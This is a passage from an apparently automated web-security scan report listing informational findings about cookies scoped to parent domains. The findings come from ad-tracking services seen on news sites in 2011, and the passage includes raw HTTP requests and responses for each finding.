Date: Mon, 11 Apr 2011 16:21:18 GMT
Connection: close
Set-Cookie: 01AI=2-2-D766EC567D77B70A389C7D071A0C270EA4C213784ABFB628475CCF489CEFE47B-252217F50ECC03FC6DFE8656A68CB869AB99A49B02FC80DFDCD099F29516FE2A; expires=Tue, 10-Apr-2012 16:21:18 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


5.27. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/1551-48114-17349-5?mpt=532355&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 4:27:58 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 525
Date: Mon, 11 Apr 2011 16:21:22 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.1
...[SNIP]...

5.28. http://api.bizographics.com/v1/profile.redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=15; BizoID=b67e419b-0f67-49a8-9374-7947627c8dff; BizoData=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

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Mon, 11 Apr 2011 16:21:26 GMT
Location: http://tag.admeld.com/pixel?admeld_dataprovider_id=4&seniority=executive&industry=business_services&functional_area=information_technology&location=texas&group=high_net_worth
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=b67e419b-0f67-49a8-9374-7947627c8dff;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=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;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive


5.29. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6036361&rn=1225152024&c7=http%3A%2F%2Fwww.wcax.com%2F&c4=%2FGlobal%2Fcategory.asp%3FC%3D18195&c8=WCAX.COM%20Local%20Vermont%20News%2C%20Weather%20and%20Sports-%2&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 09 Apr 2011 12:29:30 GMT
Connection: close
Set-Cookie: UID=167523a-24.143.206.177-1301787521; expires=Mon, 08-Apr-2013 12:29:30 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


5.30. http://bcp.crwdcntrl.net/4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwXRCoy8DAqG9lK%2FmRQZ2BQUBJxY8NKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMVEyDFNQOsnU8UokEYTImcgyipBisROA4xxQ1MCT2DODcCwiuG6DsE4ZVAXPYerE9YH0zx%2FoP4wRSi7wDEuf5AHgAyMCmY; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgUPf%2F97i7DAyM%2Bla2kh9BYgwczrJKLAwMZxkY%2FgPF3wApRgYGydubQNSX22eAFDNQ%2FCcD3y8GHmUBByY0pUBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChdXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgCc%2B7Nr; OAID=256d63b06b8b5a8d4fa891a87d791a1a

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:53 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRBYy8DAqG9lFzCJQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAMxaPUk%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:30:53 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgsPb%2F97heBgZGfSu7gEkgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O2NIOrL7dNAipmBgeknA98vBh5lAQcmoNL%2F%2F8FKgRQjA1AVo9BWS7geoErmXwzMQps2IQux%2FGJgUkqaCTcSoopJKd4LLLQWLsQotGkHskZGsCoXuCoQn4FLpk4dv5MDePfhVxC4iBm%2FAq7WSQQU1DfgV8D5eDl%2BBdwJuwgp2IlfAV%2FFW%2FwKZM0u4lcAAE3ytyU%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:30:53 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.31. http://bcp.crwdcntrl.net/4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408244
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDkw8DAqG%2FlWMPHoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPADupPMQ%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOf%2F99h9DAyM%2BlaONXwgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAihmo6CcD3y8GHmUBByag0v%2B%2FwUqBFCMDUBWj0FZLuB6mnwzMvxiYhTZtQhZi%2BcXApJQ0E24kRBWTUrwXWGglXIhRaNMOZI2MYFUucFUgPgOXTJ06ficH8O7DryBwETN%2BBVytkwgoqG%2FAr4Dz8XL8CrgTdhFSsBO%2FAr6Kt%2FgVyJpdxK8AADqztl4%3D

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:28 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRAUwsDAqG%2FlODuLQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAL3dPUc%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:28 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgKOT%2F99htDAyM%2BlaOs7NAYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2BdPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQA0xrba; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:28 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.32. http://bcp.crwdcntrl.net/4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRAUwsDAqG%2FlODuLQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAL3dPUc%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgKOT%2F99htDAyM%2BlaOs7NAYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2BdPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQA0xrba

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:35:36 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRA0g4GBUd%2FKaclNBnUGBgGlBoYGoHgvmBLdBqZ4LoMpwa9gipcZIngTomQ%2FRFAawlsIoRZBlPBBeFkMIMD1GMJLh1CJECoBTPH%2FBVNsvGCKwwhMCZuBKa4ZYO18ohANwmBK5ByYEjgOUVkNpoSeQQxzgzg3AiJYDNF3CMIrgbjsPcTV%2FyDa9SE8U4i%2BAxDn%2BgN5AJdCPgQ%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:36 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaMb%2F77FFDAyM%2BlZOS26CxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBq6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgAPFLc2; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:36 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.33. http://bcp.crwdcntrl.net/4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRA0g4GBUd%2FKaclNBnUGBgGlBoYGoHgvmBLdBqZ4LoMpwa9gipcZIngTomQ%2FRFAawlsIoRZBlPBBeFkMIMD1GMJLh1CJECoBTPH%2FBVNsvGCKwwhMCZuBKa4ZYO18ohANwmBK5ByYEjgOUVkNpoSeQQxzgzg3AiJYDNF3CMIrgbjsPcTV%2FyDa9SE8U4i%2BAxDn%2BgN5AJdCPgQ%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaMb%2F77FFDAyM%2BlZOS26CxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBq6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgAPFLc2

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:35:57 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRC0loGBUd%2FK6dspBnUGBgGlBoYGoHgvmOK5DKZEt4Epwa9gipcZIncTIrcfIigN4S2EUIsgSvggvCwGEOB6DOGlQ6hECJUApvj%2Fgik2XjDFYQSmhM3AFNcMsHY%2BUYgGYTAlcg6ipBpMCRyHmOIGpoSeQZwbAeEVQ%2FQdgvBKIC57D9GuD3H8PwhlCtF3AOJcfyAPAOu1Plw%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:57 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaO3%2F77GxDAyM%2BlZO306BxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBu6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgCYn7d6; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:57 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.34. http://bcp.crwdcntrl.net/4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDhxsDAqG8VcbmTQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeADd3Pa0%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsgwu3%2F9%2FAjDAyM%2BlYRlztBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtTQNSX2%2BuAFDMDg9BPBr5fDDzKAg5MQKX%2FH4GVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQBLgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBYVrRj

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 13:16:07 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRAjzsDAqG%2BVvteOQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAKPxPTA%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 13:16:07 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgRvz%2F9%2BDPDAyM%2Blbpe%2B1AYgwczrJKLAwMZxkY%2FgPF3wApRgYGydvNIOrL7blAipmBQfgnA98vBh5lAQcmoNL%2FF8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1ioHi7EKLRpB7JGRrAqF7gqEJ%2BBS6ZOHb%2BTA3j34VcQuIgZvwKu1kkEFNQ34FfA%2BXg5fgXcCbsIKdiJXwFfxVv8CmTNLuJXAADN7bIU; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 13:16:07 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.35. http://bcp.crwdcntrl.net/4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=408799
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRC4hoGBUd%2FKnsuFQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAFZXPOU%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgcM3%2F73FxDAyM%2Blb2XC4gMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0NIOrL7VNAipmBgfknA98vBh5lAQcmoNL%2F%2F8BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoDVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAALT7Z1

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:07 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
